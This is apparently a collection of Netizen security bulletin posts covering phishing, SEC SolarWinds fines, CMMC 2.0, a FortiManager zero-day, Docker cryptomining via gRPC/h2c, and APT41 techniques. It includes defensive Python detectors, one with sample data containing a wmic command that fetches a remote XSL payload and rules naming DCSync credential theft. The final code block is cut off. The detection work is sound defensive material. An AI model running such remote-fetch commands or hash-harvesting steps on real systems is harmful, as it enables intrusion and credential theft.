• Netizen Cybersecurity Bulletin (October 24th, 2024)

    Overview:

    • Phish Tale of the Week
    • SEC Fines Four Companies for Misleading Disclosures in SolarWinds Hack
    • CMMC 2.0 Program: Key Timeline for Defense Contractors
    • How can Netizen help?

    Phish Tale of the Week

    Oftentimes phishing campaigns created by malicious actors target users through social engineering. For example, in this email the actors pose as a university professor, Professor Johan H Enslin. The message tells us that they are seeking a research assistant to support their project and that no previous experience is required. It seems both urgent and genuine, so why shouldn’t we send them our information? Luckily, there are plenty of reasons that point to this being a scam.

    Here’s how we can tell not to fall for this phish:

    1. The first warning sign for this email is the sender’s email address. While the messaging tells you they are a professor, the sender tells a different story: “profjohanhenslin@gmail.com” is very clearly not a professor from a university like they want you to believe. Professors sending email in this way will almost always use their .edu email address.
    2. The second warning sign in this email is the messaging. The email seems almost too good to be true: remote work, a healthy weekly stipend, flexibility, everything a college student could want. If you’re seeing an email and it seems too good to be true, it probably is. Scams like this targeting college students will commonly ask for your cell phone number or other personal information in an attempt to harvest PII from you.
    3. The final warning we have, and probably the easiest way to clock this as 100% a phishing email, is the signature. If we weren’t already convinced that the sender isn’t Professor Henslin, the signature tells us itself. Uygar Abaci, also without a .edu email, is now the one sending this to us. Perhaps the cybercriminal thought that adding two professors in the email would add credibility. In all seriousness, inconsistencies like this are by far the easiest way to detect a phishing email, and this final clue puts the nail in the coffin for this poor phishing attempt.


    General Recommendations:

    A phishing attack will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via text message.

    1. Scrutinize your messages before clicking anything. Have you ordered anything recently? Does this order number match one you already have? Did the message come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    2. Verify that the sender is actually from the company that appears to be sending the message.
    3. Did you receive a message from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc.? A legitimate company will never ask for PII via instant message or email.
    4. Do not give out personal or company information over the internet.
    5. Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing messages convey a sense of urgency or even aggression in order to intimidate the recipient. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.


    Cybersecurity Brief

    In this month’s Cybersecurity Brief:

    SEC Fines Four Companies for Misleading Disclosures in SolarWinds Hack

    The U.S. Securities and Exchange Commission (SEC) has imposed hefty fines on four major companies—Unisys Corp., Avaya Holdings Corp., Check Point Software Technologies Ltd., and Mimecast Limited—for failing to accurately disclose the impact of breaches linked to the notorious SolarWinds Orion cyberattack. The SEC’s actions highlight the growing regulatory scrutiny over how organizations handle cybersecurity disclosures, particularly in incidents involving widespread and damaging cyberattacks like SolarWinds.

    The SolarWinds hack, first revealed in late 2020, was a large-scale supply chain attack that compromised the networks of numerous government agencies and private companies worldwide. A vulnerability in SolarWinds’ Orion software allowed sophisticated hackers—widely attributed to Russian state-sponsored groups—to infiltrate systems and steal sensitive data. The ramifications of the breach rippled through the technology and security industries, raising concerns about the effectiveness of supply chain security and organizational transparency in reporting cybersecurity incidents.

    In this case, the SEC determined that Unisys, Avaya, Check Point, and Mimecast had downplayed the true extent of the breaches they experienced. According to the SEC, these companies misled shareholders and the public by minimizing the severity of the incidents, even though they knew attackers had accessed their systems via the SolarWinds vulnerability.

    Unisys, for example, suffered two breaches involving the exfiltration of gigabytes of data, yet continued to describe its cybersecurity risks as purely theoretical. This lack of transparency violated SEC regulations that require companies to provide accurate, timely disclosures about material events that could affect their business operations. As a result, Unisys faces the largest fine of $4 million.

    The SEC’s findings also revealed that Avaya misrepresented the scope of the breach it experienced, initially reporting that hackers had accessed only a limited number of email messages. In reality, the attackers had also accessed a much larger set of files stored in Avaya’s cloud environment.

    Check Point and Mimecast similarly issued vague and incomplete disclosures. Check Point was aware of the intrusion but did not clearly explain the nature or scope of the breach in its public statements. Mimecast, which had encrypted credentials stolen by the attackers, failed to disclose the full extent of the stolen data.

    The penalties issued by the SEC were as follows:

    • Unisys Corp.: $4 million
    • Avaya Holdings Corp.: $1 million
    • Check Point Software Technologies Ltd.: $995,000
    • Mimecast Limited: $990,000

    These fines reflect the SEC’s broader push to hold companies accountable for how they report cybersecurity incidents. As cyberattacks become more frequent and damaging, regulators are increasing pressure on businesses to ensure they are transparent about the risks and incidents they face. The SolarWinds hack, one of the most significant breaches in recent history, serves as a case study of how critical accurate and timely cybersecurity disclosures have become. The SEC’s actions in this case emphasize the importance of cybersecurity governance and the need for companies to maintain strong internal controls for managing and reporting cyber risks.



    CMMC 2.0 Program: Key Timeline for Defense Contractors

    On October 15, 2024, the U.S. Department of Defense (DOD) unveiled the final rule for the Cybersecurity Maturity Model Certification (CMMC) 2.0 Program. This pivotal update sets forth the guidelines for establishing cybersecurity standards aimed at safeguarding federal contract information (FCI) and controlled unclassified information (CUI). As the DOD prepares to implement this framework, understanding the timeline is crucial for defense contractors looking to remain competitive.

    The CMMC implementation will unfold in four distinct phases, starting after the related DFARS Acquisition rule takes effect. Each phase builds on the previous one, establishing escalating requirements for contractors:

    • Phase 1 (1 Year): This initial phase commences after the DFARS Acquisition rule takes effect. The DOD plans to require CMMC Status Level 1 (Self) or Level 2 (Self) in all applicable DOD solicitations and contracts as a condition of award. Contracting officers will also have the discretion to require CMMC Status Level 2 (C3PAO) for specific contracts. This phase provides contractors with a year to prepare for the initial compliance requirements.
    • Phase 2 (1 Year): Following Phase 1, the second phase will also last one year. During this period, the DOD will extend the CMMC requirements to include Level 1 (Self), Level 2 (Self), or Level 2 (C3PAO) in relevant solicitations and contracts. Contracting officers may choose to delay the requirement for CMMC Status Level 2 (C3PAO) to an option period. This allows additional time for contractors to adapt to the growing security expectations.
    • Phase 3 (1 Year): The third phase will mirror the previous two, lasting one year. In this phase, the DOD will mandate CMMC Status Level 1 and Level 2 (Self and C3PAO) for all applicable solicitations and contracts. Additionally, CMMC Status Level 3 (DIBCAC) may also be included as a requirement for certain contracts. As contractors prepare for this stage, they must ensure their cybersecurity practices align with the elevated standards.
    • Phase 4 (Full Implementation): Beginning three years from the effective date of the CMMC Acquisition rule, CMMC 2.0 will be fully implemented. At this point, all DOD contracts will require adherence to the appropriate CMMC levels, effectively reinforcing a culture of cybersecurity across the defense industrial base.

    The structured timeline allows contractors to progressively align their cybersecurity practices with the DOD’s requirements, emphasizing the necessity of preparation and compliance. As the phased approach unfolds, contractors will need to actively assess their cybersecurity measures, ensuring they meet the specified CMMC levels to be eligible for contract awards.



    How Can Netizen Help?

    Netizen ensures that security gets built in, not bolted on, by providing advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


  • Fortinet Warns of Critical FortiManager Flaw Exploited in Zero-Day Attacks

    Fortinet, a prominent cybersecurity company, has disclosed a critical vulnerability in its FortiManager API, tracked as CVE-2024-47575, which has been exploited in ongoing zero-day attacks. The flaw allows attackers to steal sensitive data, including configuration files, IP addresses, and credentials of managed devices.

    Fortinet began warning FortiManager customers privately about the issue on October 13th through emails outlining mitigation steps. However, news of the vulnerability started spreading online as customers shared their experiences on Reddit, and cybersecurity researcher Kevin Beaumont discussed it on Mastodon. Beaumont dubbed the vulnerability “FortiJump” after the attack method used by threat actors.


    Zero-Day Vulnerability in FortiManager

    This critical flaw has been rated 9.8 out of 10 in severity. According to Fortinet’s security advisory (FG-IR-24-423), the vulnerability stems from a missing authentication process in a critical function within the FortiManager fgfmd daemon. This flaw can allow an unauthenticated attacker to execute arbitrary code by sending specially crafted requests.

    The exploitation of this flaw requires attackers to first extract a valid certificate from a Fortinet device, such as a FortiManager VM. Once they have this certificate, they can exploit the vulnerability to gain access to sensitive systems.


    Affected Versions and Patches

    FortiManager versions affected by the vulnerability include:

    • FortiManager 7.6.0 and earlier (upgrade to 7.6.1 or later)
    • FortiManager 7.4.0 – 7.4.4 (upgrade to 7.4.5 or later)
    • FortiManager 7.2.0 – 7.2.7 (upgrade to 7.2.8 or later)
    • FortiManager 7.0.0 – 7.0.12 (upgrade to 7.0.13 or later)
    • FortiManager 6.4.0 – 6.4.14 (upgrade to 6.4.15 or later)
    • FortiManager 6.2.0 – 6.2.12 (upgrade to 6.2.13 or later)
    • FortiManager Cloud versions 7.0.0 to 7.4.4 are also affected.

    At the time of disclosure, only patches for FortiManager versions 7.2.8 and 7.4.5 had been released, with patches for other versions expected in the coming days.
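    Turning the affected-version list above into a repeatable check is the first thing an asset owner needs when a vendor advisory lands. The Python below is an added example, not Fortinet’s or Netizen’s code: it encodes the on-premises FortiManager ranges and fixed versions exactly as listed in this bulletin (the FortiManager Cloud range is not modelled), and the host inventory it runs over is constructed for illustration. Any version string format beyond plain `major.minor.patch` with an optional build suffix is an assumption.

```python
import re

# Affected ranges and fixed versions as listed in the bulletin, one tuple per
# release branch: (lowest affected, highest affected, first fixed release).
AFFECTED_BRANCHES = [
    ((7, 6, 0), (7, 6, 0), (7, 6, 1)),
    ((7, 4, 0), (7, 4, 4), (7, 4, 5)),
    ((7, 2, 0), (7, 2, 7), (7, 2, 8)),
    ((7, 0, 0), (7, 0, 12), (7, 0, 13)),
    ((6, 4, 0), (6, 4, 14), (6, 4, 15)),
    ((6, 2, 0), (6, 2, 12), (6, 2, 13)),
]
NEWEST_AFFECTED = (7, 6, 0)  # "7.6.0 and earlier" covers branches with no fix listed


def parse_version(text):
    """Turn '7.4.3', 'v7.4.3' or '7.4.3-build2436' into a (major, minor, patch) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def assess(version_text):
    """Return (affected, fixed_version_or_None) for one FortiManager version."""
    v = parse_version(version_text)
    for low, high, fixed in AFFECTED_BRANCHES:
        if low <= v <= high:
            return True, ".".join(map(str, fixed))
        if v[:2] == low[:2] and v >= fixed:
            return False, None  # same branch, already at or past the fix
    if v <= NEWEST_AFFECTED:
        return True, None  # older branch with no fixed release in the advisory
    return False, None


def triage(inventory):
    """Map host name -> action string for a dict of host -> version string."""
    report = {}
    for host, ver in inventory.items():
        affected, fixed = assess(ver)
        if affected and fixed:
            report[host] = f"AFFECTED - upgrade to {fixed} or later"
        elif affected:
            report[host] = "AFFECTED - no fixed version listed, isolate and contact vendor"
        else:
            report[host] = "not affected by listed ranges"
    return report


if __name__ == "__main__":
    # Constructed inventory for illustration; host names and versions are invented.
    sample = {"fmg-hq": "7.4.3", "fmg-lab": "7.2.8", "fmg-old": "6.0.11", "fmg-new": "7.6.1"}
    for host, status in triage(sample).items():
        print(f"{host:8} {status}")
```

A branch that is older than anything in the advisory (6.0.x in the sample) is reported as affected with no fix, which is the conservative reading of “7.6.0 and earlier”; the operator then has to isolate the host rather than wait for a patch that may never be published for that branch.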


    Attack Method: Exploiting the FortiGate to FortiManager Protocol

    The vulnerability revolves around the FortiGate to FortiManager Protocol (FGFM), which allows FortiGate firewall devices to register with FortiManager servers for centralized management. FGFM is commonly used in setups where network address translation (NAT) is employed, allowing FortiGate units to communicate securely with FortiManager over public and private networks.

    As noted by Beaumont, attackers can exploit this protocol by using a stolen certificate to establish an SSL tunnel between a compromised FortiGate device and an exposed FortiManager server. Once connected, attackers can execute code remotely, access configurations, and potentially escalate their privileges across managed devices.


    Early Exploitation and Delayed Notification

    Fortinet customers have reported that their systems were breached even before the company issued private warnings. A now-deleted Reddit post mentioned that one customer had been attacked weeks before receiving the notification email from Fortinet, indicating that the vulnerability had been actively exploited for some time.

    Fortinet’s delayed public disclosure and the absence of a clear, timely advisory have left many administrators scrambling to secure their systems. As more customers report similar attacks, there is growing frustration within the community over the lack of transparency and prompt action by Fortinet.


    Protecting Your Systems

    Fortinet advises all customers to upgrade their FortiManager installations to the latest patched versions as soon as possible. With the vulnerability actively being exploited in the wild, these updates are critical to safeguarding networks from further attacks. Customers should also review their systems for any unauthorized devices or unusual activity, particularly related to SSL tunnel connections.

    Fortinet’s response to the CVE-2024-47575 vulnerability highlights the importance of staying vigilant and promptly applying security updates, especially in critical network management tools like FortiManager.


    How Can Netizen Help?

    Netizen ensures that security gets built in, not bolted on, by providing advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. As part of our commitment to supporting businesses in their compliance journey, we offer CMMC (Cybersecurity Maturity Model Certification) preparation services. Our team assists organizations in understanding the CMMC requirements and developing the necessary controls to meet compliance standards, ensuring they are well-prepared for CMMC assessments.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact


  • gRPC/h2c Protocol Abuse Enables XRP Cryptomining via Docker Servers

    Threat actors are exploiting Docker remote API servers for cryptomining, with a particular focus on mining XRP, a cryptocurrency designed for quick, low-cost international transfers. As the native token of the Ripple network, XRP supports a blockchain-based payment protocol that enables real-time, cross-border transactions for financial institutions, making it an attractive target for malicious actors seeking to profit from its value.

    The attackers in this case are taking advantage of gRPC over h2c (clear-text HTTP/2), which allows them to bypass common security defenses. gRPC, designed for efficient communication between services, is leveraged here for malicious purposes.


    Breakdown of Attack Steps

    1. Initial Access and API Probing:
      • The attacker begins by pinging the Docker server to check its availability. Once they confirm access, they send a version check request (Figure 3) to identify the Docker version in use. This step is crucial because it helps the attacker understand whether the server is running a version susceptible to their method of exploitation. A version with known vulnerabilities or misconfigurations is highly advantageous for the attacker.
    2. Exploiting gRPC/h2c for Command Execution:
      • After verifying that the target is vulnerable, the attacker initiates a gRPC protocol upgrade (Figure 4), upgrading the connection to HTTP/2 over clear text (h2c). This upgrade evades many security tools that primarily monitor traditional HTTP traffic and do not account for protocol changes. gRPC’s support for high-performance, bi-directional communication becomes an asset to the attacker, allowing them to communicate with the Docker server covertly.
    3. Advanced gRPC Methods for Full Control:
      • The attacker then makes use of several gRPC methods, which are part of Docker’s API, to manage the server. These include:
        • Health checks (/grpc.health.v1.Health/Check and /grpc.health.v1.Health/Watch), which ensure that the attacker’s actions do not disrupt the Docker environment in a way that would raise suspicion. These methods allow continuous monitoring of the health status of Docker containers.
        • File Synchronization (/moby.filesync.v1.FileSync/DiffCopy and /moby.filesync.v1.FileSync/TarStream), used to transfer and synchronize files between the attacker’s server and the Docker host. This enables efficient deployment of malicious software, with minimal data transfer.
        • Authentication Management (/moby.filesync.v1.Auth/Credentials and /moby.filesync.v1.Auth/FetchToken), allowing the attacker to manipulate authentication tokens. By gaining control of these tokens, they ensure persistent access to the Docker environment.
    4. Cryptominer Deployment:
      • With the Docker server fully compromised, the attacker downloads the SRBMiner cryptominer from GitHub. SRBMiner is specifically designed for mining various cryptocurrencies, including XRP, using system resources for illicit purposes. Once installed, the miner is connected to the attacker’s cryptocurrency wallet and public IP address, effectively hijacking the server’s computational power to generate XRP for the attacker.

    Impact of the Attack

    This cryptomining operation places significant strain on compromised Docker environments. Cryptomining typically consumes large amounts of CPU and GPU resources, resulting in degraded performance for legitimate applications running on the same server. This can lead to operational inefficiencies, increased cloud hosting costs, and potentially raise suspicion if the degradation in service is noticed by users or administrators.

    Furthermore, the attack demonstrates a growing trend of targeting cloud infrastructures. Docker, widely used for its flexibility in building and deploying containerized applications, has become an attractive target for cybercriminals due to the increasing number of misconfigured and exposed Docker APIs. By exploiting gRPC/h2c in this attack, the adversaries also highlight a gap in many organizations’ security postures, particularly regarding modern communication protocols.


    Detecting the Docker Attack

    Detecting an attack on Docker remote API servers, like the SRBMiner cryptominer deployment, involves monitoring for several key indicators:

    • Network traffic analysis to detect unusual or unauthorized requests to the Docker API, particularly attempts to upgrade to gRPC/h2c. Since this is not the default method for Docker communication, such requests can be flagged as suspicious.
    • Regular auditing of CPU, memory, and disk usage, which can reveal the abnormal resource consumption patterns typical of cryptomining. Any unexpected spike in system load, especially one tied to Docker containers, should trigger further investigation.
    • Intrusion detection systems (IDS) or endpoint detection and response (EDR) solutions configured to identify unusual API calls, such as those related to file synchronization, health checks, or unauthorized authentication token management.
    • Access controls and logging of API activity, which help detect and trace unauthorized access attempts or malicious changes in real time.
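    The network-side indicators above (a version probe, an `Upgrade: h2c` request, then calls to the gRPC health, file-sync and auth methods named in the attack breakdown) form a sequence that a log rule can match per source address. The Python below is an added example written for this bulletin, not code from Netizen or from the original research: it assumes a reverse proxy or daemon log in JSON-lines form with the fields shown, the request log itself is constructed (documentation-range IPs, invented timestamps), and the path `/grpc` used for the upgrade request is an assumption about where the upgrade is seen rather than a documented endpoint.

```python
import json
from collections import defaultdict

# Constructed request log in JSON-lines form, shaped like what a reverse proxy in
# front of the Docker API might emit. Addresses are documentation ranges, not IoCs.
SAMPLE_LOG = """\
{"ts": "2024-10-18T10:00:01Z", "src": "10.0.0.7", "method": "GET", "path": "/v1.45/containers/json", "headers": {}}
{"ts": "2024-10-18T10:02:10Z", "src": "203.0.113.5", "method": "GET", "path": "/_ping", "headers": {}}
{"ts": "2024-10-18T10:02:11Z", "src": "203.0.113.5", "method": "GET", "path": "/version", "headers": {}}
{"ts": "2024-10-18T10:02:12Z", "src": "203.0.113.5", "method": "POST", "path": "/grpc", "headers": {"Connection": "Upgrade, HTTP2-Settings", "Upgrade": "h2c", "Content-Type": "application/grpc"}}
{"ts": "2024-10-18T10:02:13Z", "src": "203.0.113.5", "method": "POST", "path": "/grpc.health.v1.Health/Check", "headers": {"Content-Type": "application/grpc"}}
{"ts": "2024-10-18T10:02:14Z", "src": "203.0.113.5", "method": "POST", "path": "/moby.filesync.v1.FileSync/TarStream", "headers": {"Content-Type": "application/grpc"}}
{"ts": "2024-10-18T10:02:15Z", "src": "203.0.113.5", "method": "POST", "path": "/moby.filesync.v1.Auth/FetchToken", "headers": {"Content-Type": "application/grpc"}}
"""

# gRPC method paths named in the attack breakdown, grouped by what they do.
GRPC_METHODS = {
    "/grpc.health.v1.Health/Check": "health check",
    "/grpc.health.v1.Health/Watch": "health check",
    "/moby.filesync.v1.FileSync/DiffCopy": "file sync",
    "/moby.filesync.v1.FileSync/TarStream": "file sync",
    "/moby.filesync.v1.Auth/Credentials": "auth token handling",
    "/moby.filesync.v1.Auth/FetchToken": "auth token handling",
}
PROBE_PATHS = {"/_ping", "/version"}   # availability and version checks
TRUSTED_SOURCES = {"10.0.0.7"}         # assumed allow-list of hosts permitted to use the API


def is_h2c_upgrade(headers):
    """True when the request asks to switch to clear-text HTTP/2 (h2c)."""
    h = {k.lower(): v for k, v in headers.items()}
    return h.get("upgrade", "").lower() == "h2c" or "http2-settings" in h.get("connection", "").lower()


def detect(log_text):
    """Return alerts as (src, severity, reason) tuples. Per-source state tracks the
    probe -> h2c upgrade -> gRPC method sequence described in the bulletin."""
    alerts = []
    state = defaultdict(lambda: {"probed": False, "upgraded": False, "methods": set(), "flagged": False})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        src, path, headers = rec["src"], rec["path"], rec.get("headers", {})
        st = state[src]
        if path in PROBE_PATHS:
            st["probed"] = True
        if is_h2c_upgrade(headers):
            st["upgraded"] = True
            note = " following a version probe" if st["probed"] else ""
            alerts.append((src, "high", f"clear-text HTTP/2 (h2c) upgrade on {path}{note}"))
        if path in GRPC_METHODS:
            category = GRPC_METHODS[path]
            st["methods"].add(category)
            sev = "critical" if category == "auth token handling" else "high"
            alerts.append((src, sev, f"gRPC {category} call {path}"))
        if src not in TRUSTED_SOURCES and not st["flagged"]:
            st["flagged"] = True
            alerts.append((src, "medium", "Docker API traffic from a source outside the allow-list"))
    # One summary alert per source that completed upgrade plus gRPC control calls.
    for src, st in state.items():
        if st["upgraded"] and st["methods"]:
            alerts.append((src, "critical", "probe/upgrade/gRPC sequence matches the cryptominer "
                           "deployment pattern: " + ", ".join(sorted(st["methods"]))))
    return alerts


if __name__ == "__main__":
    for src, sev, reason in detect(SAMPLE_LOG):
        print(f"[{sev:8}] {src:14} {reason}")
```

On the constructed log the trusted host produces nothing, while the external source triggers six alerts that escalate from the allow-list miss through the h2c upgrade to the token-handling call and the final sequence match. Feeding the rule from a proxy that terminates TLS keeps it working after the channel is encrypted, which the h2c-only view would not.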


    Further Security Considerations

    The use of clear text HTTP/2 (h2c) in this attack underscores the need for organizations to implement encrypted communication channels like TLS for all remote API access. This would prevent attackers from upgrading to insecure protocols without detection.

    In addition, intrusion detection systems (IDS) should be configured to detect protocol upgrades, particularly from HTTP to gRPC or h2c, as this can often indicate an attempt to bypass standard security filters. Network segmentation is another key defense in this situation—limiting access to critical infrastructure like Docker APIs to trusted IPs or internal networks can significantly reduce exposure.

    Lastly, organizations should regularly audit Docker API configurations and monitor for unusual network traffic or system resource usage spikes. Detecting cryptomining activity early is key to minimizing damage and preventing attackers from gaining a foothold.

    By targeting poorly secured Docker APIs and using advanced techniques like gRPC/h2c, attackers can gain control of cloud resources and deploy cryptominers with relative ease. Strengthening Docker security through proper API configurations, TLS, access controls, and proactive monitoring is essential in defending against these threats.




  • Netizen: Monday Security Brief (10/21/2024)

    Today’s Topics:

    • Microsoft Issues Urgent Warning to Apple Users: Critical Update Required to Address “HM Surf” Vulnerability
    • Chinese Nation-State Hackers APT41 Target Gambling Sector for Financial Gain
    • How can Netizen help?

    Microsoft Issues Urgent Warning to Apple Users: Critical Update Required to Address “HM Surf” Vulnerability

    In a recent announcement, Microsoft has alerted millions of Apple users about a serious security threat dubbed “HM Surf.” This vulnerability poses significant risks, particularly for those using macOS devices managed through a Mobile Device Management (MDM) setup, primarily targeting enterprise environments rather than individual home users.

    The HM Surf vulnerability exploits a bypass in the Transparency, Consent, and Control (TCC) framework within Safari. TCC is designed to protect user data, including sensitive information accessed via the device’s camera, microphone, and location services. However, the flaw allows attackers to gain unauthorized access to this data without the user’s consent, effectively circumventing the protective measures intended to safeguard user privacy.

    Microsoft discovered that this exploit could enable malicious actors to covertly:

    • Capture continuous video from the device’s camera.
    • Record audio through the microphone and transmit it to remote servers.
    • Retrieve sensitive information about the device’s location.
    • Manipulate Safari’s interface to operate discreetly without drawing attention.

    Microsoft has advised all macOS users to promptly update their devices to protect against this vulnerability. The flaw has been identified as CVE-2024-44133, and Apple has addressed it as part of its security updates for macOS Sequoia, released on September 16, 2024. Users are urged to apply these updates immediately to mitigate potential risks.

    In their statement, Microsoft emphasized the urgency: “We encourage macOS users to apply these security updates as soon as possible.” The update not only fortifies Safari against this specific vulnerability but also strengthens overall privacy controls within macOS.

    According to Microsoft, the vulnerability arises because Apple retains certain private entitlements for its applications, including Safari. These entitlements grant Safari extensive permissions that allow it to bypass standard TCC checks, unlike third-party browsers such as Google Chrome or Mozilla Firefox, which are required to request user permissions explicitly for accessing sensitive features.

    The implications of this are profound; if Safari is exploited, it can operate with elevated access that other browsers do not possess. Consequently, this creates a potential threat landscape for macOS users, particularly in enterprise settings where sensitive data is routinely handled.

    In response to this vulnerability, Apple has taken steps to harden Safari’s security, including restrictions on modifying configuration files that could enable such exploits. Microsoft has also announced its collaboration with other major browser vendors to enhance the security of their local configuration files. While efforts are underway for browsers based on Chromium and Firefox to adopt improved security measures, Safari users must prioritize applying the latest updates to their devices.

    For users who may have questions or require further assistance, it is advisable to consult the official Apple support channels or cybersecurity experts to ensure comprehensive protection against emerging threats.



    Chinese Nation-State Hackers APT41 Target Gambling Sector for Financial Gain

    A sophisticated cyber attack attributed to the Chinese nation-state actor APT41 has recently targeted the gambling and gaming industry, leading to significant concerns about data security and financial implications. The hacking campaign, which spanned approximately six months, involved stealthily gathering sensitive information such as network configurations, user passwords, and critical secrets from the LSASS (Local Security Authority Subsystem Service) process.

    Ido Naor, co-founder and CEO of Security Joes, emphasized the attackers’ adaptability during the intrusion. They continuously updated their tools based on the security team’s responses, demonstrating a high level of skill and methodical planning. The attack, which lasted nearly nine months, aligns with previous intrusions identified by cybersecurity vendor Sophos as part of Operation Crimson Palace.

    Naor noted that these attacks are often influenced by state-sponsored agendas, with a high degree of confidence that APT41 was motivated by financial gain this time. The attackers employed a multi-faceted approach, utilizing a custom toolset designed to bypass existing security measures while harvesting critical information and establishing covert channels for persistent remote access.

    The initial access vector for this attack remains unidentified, but evidence suggests it may have involved spear-phishing emails, given the lack of active vulnerabilities in publicly accessible web applications. Once inside the target’s network, the attackers executed a DCSync attack aimed at harvesting password hashes from service and admin accounts, allowing them to expand their access and maintain control over the network.

    APT41’s techniques included:

    • Phantom DLL Hijacking: A method that allows attackers to manipulate DLLs (Dynamic Link Libraries) to execute malicious payloads.
    • Use of wmic.exe: The legitimate Windows Management Instrumentation Command-line utility was abused to execute commands indirectly, facilitating the download of additional malware.

    The next stage of the attack involved retrieving a malicious DLL file named TSVIPSrv.dll over the SMB protocol, which then established contact with a hard-coded command-and-control (C2) server. If the connection failed, the implant would scrape GitHub for user information to update its C2 details, showcasing a unique technique to maintain operational flexibility.

    After being detected, the threat actors went quiet for several weeks before returning with a revised approach. They placed heavily obfuscated JavaScript inside a modified XSL stylesheet (texttable.xsl) and had wmic.exe load it through its /format: option; wmic executes the script embedded in the stylesheet, so no script interpreter is launched directly (a trick commonly known as “Squiblytwo”). The JavaScript acted as a downloader, fingerprinting the infected host and contacting a secondary C2 server to retrieve further malware.

    Security Joes observed that the malware specifically targeted machines within certain subnets, indicating a focused approach to compromise only valuable devices. This was achieved through filtering mechanisms that ensured only specific targets were affected, particularly those connected to the organization’s VPN.
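    Both of these techniques leave distinctive traces in Windows logs: a DCSync request appears as Security event 4662 carrying one of the directory-replication control-access rights, and the wmic stylesheet trick appears in process-creation events (Security 4688 or Sysmon event 1) as a /format: argument that points at a URL or an arbitrary file instead of a built-in format name. The Python below is an added detection example written for this page, not code from Security Joes or from the original post. The event records are constructed inline (with 4662 Properties simplified to a list of GUIDs), the domain-controller account names are assumptions, and the two replication-right GUIDs are the standard ones from the Active Directory schema.

```python
import re

# Control-access-right GUIDs from the Active Directory schema; a DCSync
# request needs one of these granted on the domain object.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# wmic's legitimate stylesheets live here; anything else handed to /format:
# is attacker-controlled XSL (the technique behind the texttable.xsl stage).
WBEM_DIR = "\\system32\\wbem\\"
FORMAT_RE = re.compile(r'(?i)/format:\s*"?([^"\s]+)')


def is_dcsync(event, dc_accounts):
    """Security 4662 requesting a replication right from a non-DC account."""
    if event.get("EventID") != 4662:
        return False
    rights = {g.lower() for g in event.get("Properties", [])}
    if not rights & REPLICATION_RIGHTS:
        return False
    # Domain controllers replicate with each other all day; anyone else
    # asking for these rights is pulling password hashes.
    allowed = {a.upper() for a in dc_accounts}
    return event.get("SubjectUserName", "").upper() not in allowed


def is_wmic_xsl_abuse(event):
    """Process creation (Security 4688 / Sysmon 1) of wmic.exe with a foreign stylesheet."""
    if event.get("EventID") not in (4688, 1):
        return False
    if not event.get("Image", "").lower().endswith("wmic.exe"):
        return False
    match = FORMAT_RE.search(event.get("CommandLine", ""))
    if not match:
        return False
    arg = match.group(1).lower()
    if "://" in arg:                  # stylesheet fetched from a remote server
        return True
    if "\\" in arg or "/" in arg:     # explicit path: only the wbem directory is legitimate
        return WBEM_DIR not in arg
    return arg.endswith(".xsl")       # bare file name rather than a format keyword


def scan(events, dc_accounts):
    """Return (index, rule) for every event that matches a detection."""
    findings = []
    for i, event in enumerate(events):
        if is_dcsync(event, dc_accounts):
            findings.append((i, "dcsync"))
        elif is_wmic_xsl_abuse(event):
            findings.append((i, "wmic_xsl_abuse"))
    return findings


# Constructed sample telemetry (not real logs); DC names are assumptions.
DC_ACCOUNTS = {"DC01$", "DC02$"}
SAMPLE_EVENTS = [
    {"EventID": 4688, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get /format:list"},
    {"EventID": 4688, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /format:"C:\Users\Public\texttable.xsl"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process list /format:"https://203.0.113.5/texttable.xsl"'},
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": [DS_REPLICATION_GET_CHANGES_ALL]},
    {"EventID": 4662, "SubjectUserName": "svc_backup",
     "Properties": [DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL]},
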